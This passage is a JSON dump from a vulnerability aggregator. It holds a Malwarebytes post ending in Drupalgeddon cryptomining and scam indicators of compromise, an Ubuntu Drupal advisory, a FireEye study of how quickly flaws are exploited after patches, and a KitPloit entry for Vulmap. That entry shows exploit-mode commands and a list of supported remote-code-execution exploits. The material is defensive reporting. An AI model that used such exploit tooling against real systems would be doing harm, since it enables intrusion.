California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-18T15:00:00", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2023-01-26T15:26:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * drupal7 \\- fully-featured content management framework\n\nIt was discovered that Drupal did not properly process certain input. An \nattacker could use this vulnerability to execute arbitrary code or \ncompletely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)\n\nIt was discovered that password reset URLs in Drupal could be forged. An \nattacker could use this vulnerability to gain access to another user's \naccount. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)\n\nIt was discovered that Drupal did not properly protect against open \nredirects. An attacker could use this vulnerability to send unsuspecting \nusers to 3rd party sites and potentially carry out phishing attacks. \nThis issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "ubuntu", "title": "Drupal vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2559", "CVE-2015-2749", "CVE-2015-2750", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2021-03-15T00:00:00", "id": "USN-4773-1", "href": "https://ubuntu.com/security/notices/USN-4773-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-30T08:30:35", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\nFigure 2: Time between vulnerability exploitation and patch issuance\n\n\u00ad_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2020-04-13T00:00:00", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "modified": "2020-04-13T00:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
[SECURITY] Fedora 28 Update: drupal7-7.64-1.fc28
